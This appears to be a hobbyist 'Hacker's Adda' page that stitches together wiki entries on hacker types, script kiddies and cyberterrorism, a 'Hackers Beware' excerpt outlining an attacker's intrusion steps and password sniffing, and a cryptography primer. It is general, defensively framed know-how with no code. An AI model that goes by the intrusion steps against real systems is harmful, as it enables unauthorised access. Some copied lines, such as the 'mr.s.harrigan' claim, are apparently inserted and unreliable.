Hacker's Adda

Steps Of Hacking

INFORMATION
# TYPES OF HACKERS
1.WHITE HAT


A white hat is the hero or good guy, especially in computing slang, where it refers to an ethical hacker
or penetration tester who focuses on securing and protecting IT systems.

White hat hacker
White hat hackers, also known as "ethical hackers," are computer security experts, who specialize in penetration testing,
and other testing methodologies, to ensure that a company's information systems are secure.
Such people are employed by companies where these professionals are sometimes
called "sneakers."[citation needed] Groups of these people are often called tiger teams or red teams.
These security experts may utilize a variety of methods to carry out their tests, including social engineering tactics,
use of hacking tools, and attempts to evade security to gain entry into secured areas.
The National Security Agency offers certifications such as the CNSS 4011.
Such a cert covers orderly ethical hacking approaches and team management.
Aggressor teams are called "red" teams. Defender teams are called "blue" teams.
---WIKI

2.BLACK HAT


A black hat is the villain or bad guy, especially in a western movie in which such a character would
wear a black hat in contrast to the hero's white hat. The phrase is often used figuratively, especially in computing slang,
where it refers to a hacker that breaks into networks or computers, or creates computer viruses.
Black Hat Hacker
Black Hat Hackers (also called "crackers"), are hackers who specialize in unauthorized penetration of information systems.
They may use computers to attack systems for profit, for fun, or for political motivations or as a part of a social cause.
Such penetration often involves modification and/or destruction of data,
and is done without authorization and hence they should not be confused with ethical hackers.
They also may distribute computer viruses, Internet worms, and deliver spam through the use of botnets.
The term may also refer to hackers who crack software to remove protection methods: copy prevention, trial/demo version,
serial number, hardware key, date checks, CD check(NO-CD) or software annoyances like nag screens and adware.
------WIKIPDIYA

3.GRAY HAT


A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts legally, sometimes in good will,
and sometimes not. They are a hybrid between white and black hat hackers.
They usually do not hack for personal gain or have malicious intentions,
but may or may not occasionally commit crimes during the course of their technological exploits.
One reason a grey hat might consider himself to be grey is to disambiguate from the other two extremes:
black and white. For example, a Grey hat Hacker may penetrate a computer system without authorization,
an illegal act in most countries. However, the Hacker may simply patch the security hole that allowed them
access without damaging the system. In this situation, they may or may not disclose their activities, due to legal ramifications.
It is possibly misleading to say that grey hat hackers do not hack for personal gain.
While they do not necessarily hack for malicious purposes, grey hats do hack for a reason, a reason which more often
than not remains undisclosed. A grey hat will not necessarily notify the system admin of a penetrated system of their penetration.
A grey hat will prefer anonymity at almost all cost, carrying out their penetration undetected and then leaving undetected.
Consequently, grey hat penetrations of systems tend to be far more passive activities such as testing, monitoring,
or less destructive forms of data transfer and retrieval
In addition, they may be further disambiguated by their stance as it refers to the proper disclosure of Computer security flaws.
Where as a White hat will generally work with a vendor to correct the flaw, within a time frame, or under certain conditions.
They also may attempt to pressure vendors to release a patch for a flaw through the possibility of disclosure.
Their intention is to make systems safer. A Black hat will generally never disclose information to the public since doing so will
cause systems to be patched and greatly reduce the effectiveness of the vulnerability.
In fact there as been a long standing controversy of black hats opposed to the white hat policy of Full disclosure.
Grey hats may or be not release vulnerabilities to the vendor or the public.
They may attempt to sell them to Black hats or White hats.
In April 2000, grey hat hackers gained unauthorized access to apache.org.These people could have tried to damage
apache.org servers, write text offensive to Apache crew, or distribute trojans or other malicious actions. Instead, they
chose just to alert Apache crew of the problems and then to publish
-----WIKI

# How and Why Hackers Do It

Attackers break into systems for a variety of reasons and for a variety of
purposes. Until you understand how attackers break into systems and why
they do it, you will have a hard time defending against the variety of
attacks that are currently being used to compromise systems. This
chapter will take a detailed look at these issues so you can better
understand the processes, methods, and types of attacks that are
currently being used.

What Is an Exploit?

Because the topic of exploits will be addressed throughout the book, this
is probably a good time to cover what an exploit actually is.
If this were a short-answer question, the correct answer would be “an
exploit can be anything.” Basically, anything that can be used to
compromise a machine is considered an exploit. Remember, we are also
using a loose definition of the word compromise. A compromise could
include the following:
• Gaining access
• Simplifying gaining access
• Taking a system offline
• Desensitizing sensitive information

For example, going through a company’s garbage to find sensitive
information can be considered an exploit. If an attacker goes through the
garbage and finds a computer printout of top-secret information about a
company’s new product, he has technically compromised the system
without ever touching it. This is why addressing all the ways a system can
be exploited is so important. Many times, security professionals put on
blinders and look at only one aspect of security. It is important to
remember that a chain is only as strong as its weakest link, and an
attacker will compromise the weakest link in a company’s security.
Therefore, it is critical that security professionals step back and properly
look at and address all the security issues a company might face.
To look at a more formal definition, www.dictionary.com defines an exploit
as “a security hole or an instance of a security hole.” This brings out a
very important point: For there to be an exploit, there has to be a
weakness that can be compromised. If there are no weaknesses, there is
nothing to exploit. That is why most people would say that a truly secure
system is one that is not plugged into a network or any sort of electricity
and buried in 30 feet of cement under the support beams for the Brooklyn
Bridge. In this case, the number of possible exploits is minimized because
the number of weaknesses is reduced or eliminated. It is also important to
point out that, although the number of exploits is minimized, the
functionality of the system is also severely minimized. One of the main
reasons why companies do not have truly secure servers is that,
whenever you increase security, you reduce functionality, and
functionality is what keeps a company in business. The counter argument
I always make is that functionality might keep a company in business, but
lack of security will put a company out of business.
Therefore, when building secure systems, it is critical that you minimize
the risk while reducing the impact it has on overall functionality. Figure
2.1 shows the constant battle of trying to balance security, functionality,
and ease of use. Imagine that there is a ball in the triangle and you can
move it to whatever corner you want. As you move the ball toward the
corner of security, you are moving farther away from the other two

The Attacker’s Process :)

There are many ways an attacker can gain access or exploit a system. No
matter which way an attacker goes about it, there are some basic steps
that are followed:
1. Passive reconnaissance.
2. Active reconnaissance (scanning).
3. Exploiting the system:
o Gaining access through the following attacks:
Operating system attacks
Application level attacks
Scripts and sample program attacks
Misconfiguration attacks
o Elevating of privileges
o Denial of Service
4. Uploading programs.
5. Downloading Data.
6. Keeping access by using the following:
o Backdoors
o Trojan horses

7. Covering tracks. :)

Note that it is not always necessary to perform all of these steps, and in
some cases, it is necessary to repeat some of the steps. For example, an
attacker performs the active and passive reconnaissance steps and, based
on the information he gathers about the operating systems on certain
machines, he tries to exploit the system. After unsuccessfully trying all
sorts of operating system attacks (Step 3), he might go back to Steps 1
and 2. At this point, his active reconnaissance will probably be more in
depth, focusing on other applications that are running or possible scripts
that are on the system, and even trying to find out more information
about the operating system, such as revision and patch levels. After he
has more information, he will go back to attacking the system.

You would hope that, by protecting your systems from attack, this process
would take a long time to accomplish, frustrating the attacker enough to
give up before he gains access. Ideally, a company should have proper
Intrusion Detection Systems in place so that it can detect an attack and
protect against it before it does any damage. Most companies should
strive for this, but unfortunately most ignore it.

Let’s briefly run through each of the steps from an attacker’s point of
view. The attacker starts off seeing if he has any general information
about the system. This consists of information like the domain name and
any servers or systems the company might have. After all of the passive
information has been gathered, active reconnaissance begins. This is
where the attacker tries to find out as much information about the
systems, without setting off too many alarms. Then, he gathers things
such as IP addresses, open ports, operating system and version, and so
on. After some initial information is gathered, an attacker steps through
each of the attack areas: operating system, applications, scripts, and
misconfigured systems. For each item, an attacker tries an attack; if
unsuccessful, he tries to gather more information about the component.
After all the information has been gathered for an item, an attacker moves
on to the next item. After an attack has been successful and access has
been gained, the attacker then uploads any necessary programs,
preserves access by installing Trojan horses, and finally cleans up the
system to hide the attack.

Passive Reconnaissance :)

To exploit a system, an attacker must have some general information;
otherwise, he does not know what to attack. A professional burglar does
not rob houses randomly. Instead, he picks someone, like Bob, and he
begins the passive reconnaissance stage of figuring out where Bob’s house
is located and other general information.

The same thing has to be done with hacking. After an attacker picks a
company to go after, he has to find out the company’s name and where it
is located on the Internet. Chapter 3, “Information Gathering,” covers this
in detail. The sections in this chapter on reconnaissance are meant to lay
the groundwork for Chapter 3.
Passive information gathering is not always useful by itself, but is a
necessary step, because knowing that information is a prerequisite to
performing the other steps. In one case, I was gathering information to
perform an authorized penetration test for a company.
I pulled up to the company around 4:00 p.m. I chose this time for two
reasons. First, because most people leave between 4:30 p.m. and 5:30
p.m., I could observe a lot of behavior, but to do so I needed to park near
the front of the building. Usually, that late in the day, some people have
already left and you can get a close spot—thus, the second reason. I
parked near the entrance and rolled down my window. Three people came
out and stopped in front of my car to have a smoke. As they smoked, they
talked about business and a new server they just installed. It was set up
for testing file transfer and FTP access to remote offices, but they went on
to explain that, because they were having trouble with authentication,
they allowed anonymous access. As they finished the conversation, they
started joking with the one person on why he named the server Alpha-
Two.
In the course of five minutes, I was given the name of a server that was
accessible from the Internet and the fact that authentication was turned
off, which meant that I had full access to the network! As fictitious as this
story might sound, it actually happened and is quite realistic. It is amazing
what people will say if they think that no one else is listening.
In some cases, passive reconnaissance can provide everything an attacker
needs to gain access. On the surface it might seem like passive
reconnaissance is not that useful, but do not underestimate the amount of
information an attacker can acquire if it is done properly.
Passive attacks, by nature of how they work, might not seem as powerful
as active attacks, but in some cases they can be more powerful. With
passive attacks, you do not directly get access, but sometimes you get
something even better: guaranteed access across several avenues.
One of the most popular types of passive attacks is sniffing. This involves
sitting on a network segment and watching and recording all traffic that
goes by. This can yield a lot of information. For example, if an attacker is
looking for a specific piece of information, he might have to search
through hundreds of megabytes of data to find what he is looking for. In
“ Hackers Beware “ New Riders Publishing 37
other cases, if he knows the pattern of the packets he is looking for, it can
be quite easy.
An example of this is sniffing passwords. There are programs that
attackers can run from a workstation that looks for NT authentication
packets. When it finds one, it pulls out the encrypted password and saves
it. An attacker can then use a password cracker to get the plain text
password. To get a single password, this might seem like a lot of work.
But imagine an attacker setting this up to start running at 7:00 a.m. and
stop running at 10:00 a.m. Most people log on to the network in those
three hours, so he can gather hundreds of passwords in a relatively short
time period.
Another useful type of passive attack is information gathering. During this
type of attack, an attacker gathers information that will help launch an
active attack. For example, let’s say that an attacker sits near the loading
dock of a company to watch deliveries. Most companies print their logos
on the sides of boxes and are easy to spot. If an attacker notices that you
receive several Sun boxes, he can be pretty sure that you are running
Solaris. If, shortly after the release of Windows 2000, a company receives
boxes from Microsoft, an attacker could probably guess that the company
is upgrading its servers to the new operating system.

Active Reconnaissance :)

At this point, an attacker has enough information to try active probing or
scanning against a site. After a burglar knows where a house is located
and if it has a fence, a dog, bars on the windows, and so on, he can
perform active probing. This consists of going up to the house and trying
the windows and doors to see if they are locked. If they are, he can look
inside to see what types of locks there are and any possible alarms that
might be installed. At this point, the burglar is still gathering information.
He is just doing it in a more forceful or active way.
With hacking, the same step is performed. An attacker probes the system
to find out additional information. The following is some of the key
information an attacker tries to discover:
• Hosts that are accessible
• Locations of routers and firewalls
• Operating systems running on key components
• Ports that are open
• Services that are running
• Versions of applications that are running
The more information an attacker can gain at this stage, the easier it will
be when he tries to attack the system. Usually, the attacker tries to find
out some initial information covertly and then tries to exploit the system.
If he can exploit the system, he moves on to the next step. If he cannot
exploit the system, he goes back and gathers more information. Why
gather more information than he needs, especially if gathering that extra
information sets off alarms and raises suspicion? It is an iterative process,
where an attacker gathers a little, tests a little, and continues in this
fashion until he gains access.
Keep in mind that, as an attacker performs additional active
reconnaissance, his chances of detection increase because he is actively
performing some action against the company. It is critical that you have
some form of logging and review in place to catch active reconnaissance,
because, in a lot of cases, if you cannot block an attacker here, your
chances of detecting him later decrease significantly.
When I perform an assessment, usually I run some tests to figure out the
IP address of the firewall and routers. Next, I try to determine the type of
firewall, routers, and the version of the operating system the company is
running to see if there are any known exploits for those systems. If there
are known exploits, I compromise those systems. At that point, I try to
determine which hosts are accessible and scan those hosts to determine
which operating system and revision levels they are running. If an
attacker can gain access to the external router or firewall, he can gather a
lot of information and do a lot of damage.
For example, if I find that a server is running Windows NT 4.0 Service
Pack 4, I scan for all vulnerabilities with that version and try to use those
vulnerabilities to exploit the system. Surprisingly, with most companies,
when I perform active reconnaissance, their technical staff fails to detect
that I have probed their systems. In some cases, it is because they are
not reviewing their log files, but in most cases, it is because they are not
logging the information. Logging is a must, and there is no way to get
around it. If you do not know what an attacker is doing on your system,
how can you protect against it?
The goal of a company in protecting its computers and networks is to
make it so difficult for an attacker to gain access that he gives up before
he gets in. Today, because so many sites have minimal or no security,
attackers usually gain access relatively quickly and with a low level of
expertise. Therefore, if a company’s site has some security, the chances of
an attacker exploiting its systems are decreased significantly, because if
he meets some resistance, he will probably move on to a more vulnerable
site. This is only true for an opportunistic attacker who scans the Internet
looking for any easy target.
In cases of corporate espionage, where an attacker is targeting your site,
some security will make the attacker’s job more difficult, but will not
necessarily stop him. In this situation, hopefully the extra security will
make it so difficult that you will detect the attack before he gains access
and stop him before any damage is done.

In most cases, an attacker uses a passive reconnaissance attack first to
properly position himself. Next, he uses an active reconnaissance attack to
gather the information he is after. An example is an attacker breaking into
a machine so that he can sniff passwords off of the network when users
log on each morning. As this example shows, to perform active
reconnaissance, an attacker must have some level of access to the
system.

Each attack has value, but as you will see throughout this book, the real
value is gained when multiple techniques or attacks are combined. Giving
a carpenter a single tool allows him to build part of a house. When a
carpenter is familiar, well-trained, and has several tools in his toolbox, he
can build an entire house. These same principles apply for successfully
breaking into a system—or in our case, successfully preventing a break-in.

Exploiting the System :)

Now comes the scary part for a security professional. When most people
think about exploiting a system, they only think about gaining access, but
there are actually two other areas: elevation of privileges and denial of
services. All three are useful to the attacker depending on the type of
attack he wants to launch. There are also cases where they can be used in
conjunction with each other. For example, an attacker might be able to
compromise a user’s account to gain access to the system, but because he
does not have root access, he cannot copy a sensitive file. At this point,
the attacker would have to run an elevation of privileges attack to
increase his security level so that he can access the appropriate files.

It is also important to note that an attacker can exploit a system to use it
as a launching pad for attacks against other networks. This is why system
break-ins are not always noticed, because attackers are not out to do
direct harm or steal information. In these cases, a company’s valuable
resources are being used and, technically, that company is hacking into
other companies.

Think about this for a minute: Whether it is authorized or not, if someone
is using Company A’s computers to break into Company B, when Company
B investigates, it will point back to Company A. This is called a
downstream liability problem. This can have huge legal implications for a
company if it is not careful—especially if the attackers want to have some
fun and carefully pick the two companies so that Company A and B are
major competitors. If you are the head of security for Company A, you
better hope that your resume is updated.

ERIC COLE

# SCRIPTKIDDIE

In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, script-running juvenile (SRJ), or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks. It is generally assumed that script kiddies are juveniles who lack the ability to write sophisticated hacking programs or exploits on their own, and that their objective is to try to impress their friends or gain credit in underground hacker communities.[1] Tools Script kiddies have at their disposal a large number of effective, easily downloadable malicious programs capable of harassing even advanced computers and networks.[1] Such programs have included WinNuke applications, Back Orifice, NetBus, Sub7, Metasploit, ProRat and often software intended for legitimate security auditing. Another simple means of attack is a mass mailer worm. These are spread through e-mails and, once opened, they can be automatically sent throughout entire systems, often without the users realizing it. The purpose of a worm varies, from sapping the targeted computer or network of bandwidth and therefore slowing performance, to deleting or encrypting files. Other commands are possible. In a denial-of-service (DoS) attack, the attacker tries to shut down network activity in a target system by sapping the computer network of bandwidth or other resources. A number of distinct DoS attacks have been created that pursue this goal through different means, such as SYN flood, ICMP flood (a.k.a Smurf attack) and ping floods. If the server gets overwhelmed with excessive amounts of information, it will stop responding, and may require a restart.[2]

---WIKI

# CYBERTERRORISM

Cyberterrorism is a controversial term. Some authors choose a very narrow definition, relating to deployments,
by known terrorist organizations, of disruption attacks against information systems for the primary purpose
of creating alarm and panic. By this narrow definition, it is difficult to identify any instances of cyberterrorism.
Cyberterrorism can also be defined much more generally, for example, as The premeditated use of disruptive activities,
or the threat thereof, against computers and/or networks, with the intention to cause harm or further social,
ideological, religious, political or similar objectives. Or to intimidate any person in furtherance of such objectives.
This broad definition was created by Kevin G. Coleman of the Technolytics Institute.The term was coined by Barry C. Collin.
Cyberterrorism
As the Internet becomes more pervasive in all areas of human endeavor, individuals or groups can use the anonymity
afforded by cyberspace to threaten citizens, specific groups (i.e. with membership based on ethnicity or belief),
communities and entire countries, without the inherent threat of capture, injury,
or death to the attacker that being physically present would bring.
one famous cyber terrorist is mr.s.harrigan who almost caused the united states millitry cyber terrorism system to crash
As the Internet continues to expand, and computer systems continue to be assigned more responsibility
while becoming more and more complex and interdependent, sabotage or terrorism via cyberspace may become
a more serious threat.

The basic definition of cyberterrorism
Cyberterrorism is the leveraging of a target's computers and information , particularly via the Internet, to cause physical,
real-world harm or severe disruption of infrastructure.

Cyberterrorism is defined as The premeditated use of disruptive activities, or the threat thereof,
against computers and/or networks, with the intention to cause harm or further social, ideological, religious, political
or similar objectives. Or to intimidate any person in furtherance of such objectives.
This definition was created by Kevin G. Coleman of the Technolytics Institute.

...subsumed over time to encompass such things as simply defacing a web site or server, or attacking non-critical systems,
resulting in the term becoming less useful...

There are some that say cyberterrorism does not exist and is really a matter of hacking or information warfare.
They disagree with labeling it terrorism because of the unlikelihood of the creation of fear, significant physical harm,
or death in a population using electronic means, considering current attack and protective technologies.

The National Conference of State Legislatures (NCSL), a bipartisan organization of legislators and their staff created to
help policymakers of all 50 states address vital issues such as those affecting the economy or homeland security
by providing them with a forum for exchanging ideas, sharing research and obtaining technical assistance
defines cyberterrorism as follows:

the use of information technology by terrorist groups and individuals to further their agenda.
This can include use of information technology to organize and execute attacks against networks,
computer systems and telecommunications infrastructures, or for exchanging information or making threats electronically.
Examples are hacking into computer systems, introducing viruses to vulnerable networks, web site defacing,
Denial-of-service attacks, or terroristic threats made via electronic communication. Demitri Jesus Olmo.

Background Information
Public interest in cyberterrorism began in the late 1980s. As the year 2000 approached, the fear and uncertainty
about the millennium bug heightened and interest in potential cyberterrorist attacks also increased. However,
although the millennium bug was by no means a terrorist attack or plot against the world or the United States,
it did act as a catalyst in sparking the fears of a possibly large-scale devastating cyber-attack. Commentators noted that many
of the facts of such incidents seemed to change, often with exaggerated media reports.

The high profile terrorist attacks in the United States on September 11, 2001 lead to further media coverage
of the potential threats of cyberterrorism in the years following. Mainstream media coverage often discusses the possibility
of a large attack making use of computer networks to sabotage critical infrastructures with the aim of putting human
lives in jeopardy or causing disruption on a national scale either directly or by disruption of the national economy.

Authors such as Winn Schwartau and John Arquilla are reported to have had considerable financial success selling
books which described what were purported to be plausible scenarios of mayhem caused by cyberterrorism.
Many critics claim that these books were unrealistic in their assessments of whether the attacks described
(such as nuclear meltdowns and chemical plant explosions) were possible.
A common thread throughout what critics perceive as cyberterror-hype is that of non-falsifiability; that is,
when the predicted disasters fail to occur, it only goes to show how lucky we've been so far, rather than impugning the theory.

Effects of cyberterrorism
Cyberterrorism can have a serious large-scale influence on significant numbers of people.
It can weaken countries' economy greatly, thereby stripping it of its resources and making it more vulnerable to military attack.

Cyberterror can also affect internet-based businesses. Like brick and mortar retailers and service providers,
most websites that produce income (whether by advertising, monetary exchange for goods or paid services)
could stand to lose money in the event of downtime created by cyber criminals.

As internet-businesses have increasing economic importance to countries, what is normally cybercrime becomes more
political and therefore "terror" related.

Examples of cyberterrorism
One example of cyberterrorists at work was when terrorists in Romania illegally gained access to the
computers controlling the life support systems at an Antarctic research station, endangering the 58 scientists involved.
However, the culprits were stopped before damage actually occurred. Mostly non-political acts of sabotage have
caused financial and other damage, as in a case where a disgruntled employee caused the release of untreated sewage into
water in Maroochy Shire, Australia.[3] Computer viruses have degraded or shut down some non-essential
systems in nuclear power plants, but this is not believed to have been a deliberate attack.

More recently, in May 2007 Estonia was subjected to a mass cyber-attack in the wake of the removal of a Russian
World War II war memorial from downtown Talinn. The attack was a distributed denial of service attack in which selected sites were bombarded with traffic in order to force them offline; nearly all Estonian government ministry networks as well as two major Estonian bank networks were knocked offline; in addition, the political party website of Estonia's current Prime Minister Andrus Ansip featured a counterfeit letter of apology from Ansip for removing the memorial statue. Despite speculation that the attack had been coordinated by the Russian government, Estonia's defense minister admitted he had no evidence linking cyber attacks to Russian authorities. Russia called accusations of its involvement "unfounded," and neither NATO nor European Commission experts were able to find any proof of official Russian government participation.[3] In January 2008 a man from Estonia was convicted for launching the attacks against the Estonian Reform Party website and fined.

Even more recently, in October 2007, the website of Ukrainian president Viktor Yushchenko was attacked by hackers.
A radical Russian nationalist youth group, the Eurasian Youth Movement, claimed responsibility.

Since the world of computers is ever-growing and still largely unexplored,
countries new to the cyber-world produce young computer scientists usually interested in
"having fun". Countries like China, Greece, India, Israel, and South Korea have all been in the spotlight before
by the U.S. Media for attacks on information systems related to the CIA and NSA. Though these attacks are usually the result
of curious young computer programmers, the United States has more than legitimate concerns about national security when
such critical information systems fall under attack. In the past five years, the United States has taken a larger
interest in protecting its critical information systems. It has issued contracts for high-leveled research in

electronic security to nations such as Greece and Israel, to help protect against more serious and dangerous attacks.
In 1999 hackers attacked NATO computers. The computers flooded them with email and hit them with a
denial of service (DoS). The hackers were protesting against the NATO bombings in Kosovo. Businesses,
public organizations and academic institutions were bombarded with highly politicized emails
containing viruses from other European countries

Sci/Tech | Kosovo info warfare spreads

Countering cyberterrorism
The US Department of Defense charged the United States Strategic Command with the duty of combating cyberterrorism.
This is accomplished through the Joint Task Force-Global Network Operations (JTF-GNO). JTF-GNO is the operational
component supporting USSTRATCOM in defense of the DoD's Global Information Grid. This is done by integrating GNO c
apabilities into the operations of all DoD computers, networks, and systems used by DoD combatant commands, services and
agencies.

On November 2, 2006, the Secretary of the Air Force announced the creation of the Air Force's newest MAJCOM,
the Air Force Cyber Command, which will be tasked to monitor and defend American interest in cyberspace.
The AFCC will draw upon the personnel resources of the 67th Network Warfare Wing as well as
other resources of the Eighth Air Force; it will be placed under the command of Lieutenant
General Robert J. Elder, Jr. Designated to stand up around Summer 2007.



# CRYTOGRAPHY



Introduction :)

Cryptography is everywhere these days, from hashed passwords to encrypted
mail, to Internet Protocol Security (IPSec) virtual private networks (VPNs) and
even encrypted filesystems. Security is the reason why people opt to encrypt
data, and if you want your data to remain secure you’d best know a bit about
how cryptography works.This chapter certainly can’t teach you how to become a
professional cryptographer—that takes years of study and practice—but you will
learn how most of the cryptography you will come in contact with functions
(without all the complicated math, of course).
We’ll examine some of the history of cryptography and then look closely at a
few of the most common algorithms, including Advanced Encryption Standard
(AES), the recently announced new cryptography standard for the U.S. government.
We’ll learn how key exchanges and public key cryptography came into
play, and how to use them. I’ll show you how almost all cryptography is at least
theoretically vulnerable to brute force attacks.
Naturally, once we’ve covered the background we’ll look at how cryptography
can be broken, from cracking passwords to man-in-the-middle-type
attacks.We’ll also look at how other attacks based on poor implementation of
strong cryptography can reduce your security level to zero. Finally, we’ll examine
how weak attempts to hide information using outdated cryptography can easily
be broken.

Understanding Cryptography Concepts :)

What does the word crypto mean? It has its origins in the Greek word kruptos,
which means hidden.Thus, the objective of cryptography is to hide information
so that only the intended recipient(s) can “unhide” it. In crypto terms, the hiding
of information is called encryption, and when the information is unhidden, it is
called decryption.A cipher is used to accomplish the encryption and decryption.
Merriam-Webster’s Collegiate Dictionary defines cipher as “a method of transforming
a text in order to conceal its meaning.”The information that is being
hidden is called plaintext; once it has been encrypted, it is called ciphertext.The
ciphertext is transported, secure from prying eyes, to the intended recipient(s),
where it is decrypted back into plaintext.

History :)

According to Fred Cohen, the history of cryptography has been documented
back to over 4000 years ago, where it was first allegedly used in Egypt. Julius
Caesar even used his own cryptography called Caesar’s Cipher. Basically, Caesar’s
Cipher rotated the letters of the alphabet to the right by three. For example, S
moves to V and E moves to H. By today’s standards the Caesar Cipher is
extremely simplistic, but it served Julius just fine in his day. If you are interested
in knowing more about the history of cryptography, the following site is a great
place to start: www.all.net/books/ip/Chap2-1.html.
In fact, ROT13 (rotate 13), which is similar to Caesar’s Cipher, is still in use
today. It is not used to keep secrets from people, but more to avoid offending
people when sending jokes, spoiling the answers to puzzles, and things along
those lines. If such things occur when someone decodes the message, then the
responsibility lies on them and not the sender. For example, Mr. G. may find the
following example offensive to him if he was to decode it, but as it is shown it
offends no one:V guvax Jvaqbjf fhpxf…
ROT13 is simple enough to work out with pencil and paper. Just write the
alphabet in two rows; the second row offset by 13 letters:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
NOPQRSTUVWXYZABCDEFGHIJKLM
Encryption Key Types
Cryptography uses two types of keys: symmetric and asymmetric. Symmetric keys
have been around the longest; they utilize a single key for both the encryption
and decryption of the ciphertext.This type of key is called a secret key, because
you must keep it secret. Otherwise, anyone in possession of the key can decrypt
messages that have been encrypted with it.The algorithms used in symmetric key
encryption have, for the most part, been around for many years and are well
known, so the only thing that is secret is the key being used. Indeed, all of the
really useful algorithms in use today are completely open to the public.
A couple of problems immediately come to mind when you are using symmetric
key encryption as the sole means of cryptography. First, how do you
ensure that the sender and receiver each have the same key? Usually this requires
the use of a courier service or some other trusted means of key transport.
Second, a problem exists if the recipient does not have the same key to decrypt
Cryptography

• Cryptography

the ciphertext from the sender. For example, take a situation where the symmetric
key for a piece of crypto hardware is changed at 0400 every morning at
both ends of a circuit.What happens if one end forgets to change the key
(whether it is done with a strip tape, patch blocks, or some other method) at the
appropriate time and sends ciphertext using the old key to another site that has
properly changed to the new key? The end receiving the transmission will not be
able to decrypt the ciphertext, since it is using the wrong key.This can create
major problems in a time of crisis, especially if the old key has been destroyed.
This is an overly simple example, but it should provide a good idea of what can
go wrong if the sender and receiver do not use the same secret key.
Asymmetric cryptography is relatively new in the history of cryptography,
and it is probably more recognizable to you under the synonymous term public
key cryptography.Asymmetric algorithms use two different keys, one for encryption
and one for decryption—a public key and a private key, respectively.Whitfield
Diffie and Martin Hellman first publicly released public key cryptography in
Assessing Algorithmic Strength
Algorithmic security can only be proven by its resistance to attack. Since
many more attacks are attempted on algorithms which are open to the
public, the longer an algorithm has been open to the public, the more
attempts to circumvent or break it have occurred. Weak algorithms are
broken rather quickly, usually in a matter of days or months, whereas
stronger algorithms may be used for decades. However, the openness of
the algorithm is an important factor. It’s much more difficult to break an
algorithm (whether weak or strong) when its complexities are completely
unknown. Thus when you use an open algorithm, you can rest
assured in its strength. This is opposed to a proprietary algorithm,
which, if weak, may eventually be broken even if the algorithm itself is
not completely understood by the cryptographer. Obviously, one should
limit the trust placed in proprietary algorithms to limit long-term liability.
Such scrutiny is the reason the inner details of many of the
patented algorithms in use today (such as RC6 from RSA Laboratories)
are publicly available.

Tools & Traps… :)

1976 as a method of exchanging keys in a secret key system.Their algorithm,
called the Diffie-Hellman (DH) algorithm, is examined later in the chapter. Even
though it is commonly reported that public key cryptography was first invented
by the duo, some reports state that the British Secret Service actually invented it
a few years prior to the release by Diffie and Hellman. It is alleged, however, that
the British Secret Service never actually did anything with their algorithm after
they developed it. More information on the subject can be found at the following
location: www.wired.com/wired/archive/7.04/crypto_pr.html
Some time after Diffie and Hellman, Phil Zimmermann made public key
encryption popular when he released Pretty Good Privacy (PGP) v1.0 for DOS
in August 1991. Support for multiple platforms including UNIX and Amiga were
added in 1994 with the v2.3 release.Over time, PGP has been enhanced and
released by multiple entities, including ViaCrypt and PGP Inc., which is now part
of Network Associates. Both commercial versions and free versions (for noncommercial
use) are available. For those readers in the United States and Canada,
you can retrieve the free version from http://web.mit.edu/network/pgp.html.
The commercial version can be purchased from Network Associates at
www.pgp.com.

Learning about Standard

Cryptographic Algorithms

Just why are there so many algorithms anyway? Why doesn’t the world just standardize
on one algorithm? Given the large number of algorithms found in the
field today, these are valid questions with no simple answers. At the most basic
level, it’s a classic case of tradeoffs between security, speed, and ease of implementation.
Here security indicates the likelihood of an algorithm to stand up to current
and future attacks, speed refers to the processing power and time required to
encrypt and decrypt a message, and ease of implementation refers to an algorithm’s
predisposition (if any) to hardware or software usage. Each algorithm has different
strengths and drawbacks, and none of them is ideal in every way. In this chapter,
we will look at the five most common algorithms that you will encounter: Data
Encryption Standard (DES), AES [Rijndael], International Data Encryption
Algorithm (IDEA), Diffie-Hellman, and Rivest, Shamir, Adleman (RSA). Be
aware, though, that there are dozens more active in the field.

Cryptography

Understanding Symmetric Algorithms
In this section, we will examine several of the most common symmetric algorithms
in use: DES, its successor AES, and the European standard, IDEA. Keep in
mind that the strength of symmetric algorithms lies primarily in the size of the
keys used in the algorithm, as well as the number of cycles each algorithm
employs. All symmetric algorithms are also theoretically vulnerable to brute force
attacks, which are exhaustive searches of all possible keys. However, brute force
attacks are often infeasible.We will discuss them in detail later in the chapter.
DES
Among the oldest and most famous encryption algorithms is the Data Encryption
Standard, which was developed by IBM and was the U.S. government standard
from 1976 until about 2001. DES was based significantly on the Lucifer algorithm
invented by Horst Feistel, which never saw widespread use. Essentially, DES uses a
single 64-bit key—56 bits of data and 8 bits of parity—and operates on data in
64-bit chunks.This key is broken into 16 separate 48-bit subkeys, one for each
round, which are called Feistel cycles. Figure 6.1 gives a schematic of how the DES
encryption algorithm operates.
Each round consists of a substitution phase, wherein the data is substituted
with pieces of the key, and a permutation phase, wherein the substituted data is
scrambled (re-ordered). Substitution operations, sometimes referred to as confusion
operations, are said to occur within S-boxes. Similarly, permutation operations,
sometimes called diffusion operations, are said to occur in P-boxes. Both of
these operations occur in the “F Module” of the diagram.The security of DES
lies mainly in the fact that since the substitution operations are non-linear, so the
resulting ciphertext in no way resembles the original message.Thus, languagebased
analysis techniques (discussed later in this chapter) used against the ciphertext
reveal nothing.The permutation operations add another layer of security by
scrambling the already partially encrypted message.
Every five years from 1976 until 2001, the National Institute of Standards and
Technology (NIST) reaffirmed DES as the encryption standard for the U.S. government.
However, by the 1990s the aging algorithm had begun to show signs
that it was nearing its end of life. New techniques that identified a shortcut
method of attacking the DES cipher, such as differential cryptanalysis, were proposed
as early as 1990, though it was still computationally unfeasible to do so.

Cryptography

SECURITY ALERT

How can symmetric algorithms such as DES be made more secure?
Theoretically, there are two ways: either the key length needs to be
increased, or the number of rounds in the encryption process needs to
be increased. Both of these solutions tend to increase the processing
power required to encrypt and decrypt data and slow down the encryption/
decryption speed because of the increased number of mathematical
operations required. Examples of modified DES include 3-DES (a.k.a.
Triple DES) and DESX. Triple DES uses three separate 56-bit DES keys as a
single 168-bit key, though sometimes keys 1 and 3 are identical, yielding
112-bit security. DESX adds an additional 64-bits of key data. Both 3-DES
and DESX are intended to strengthen DES against brute force attacks.

Figure 6.1 Diagram of the DES Encryption Algorithm
Preliminary Permutation
56-Bit Data Input
8-bit Parity Input
Incoming Data Stream
(Cleartext)
010011001101011
XOR
F
Module
64-Bits
48-Bits Subkey N
Repeat for N
Iterations
Final Permutation
56-Bit Data Output
Outgoing Data Stream
(Ciphertext)
111010110100101
KN
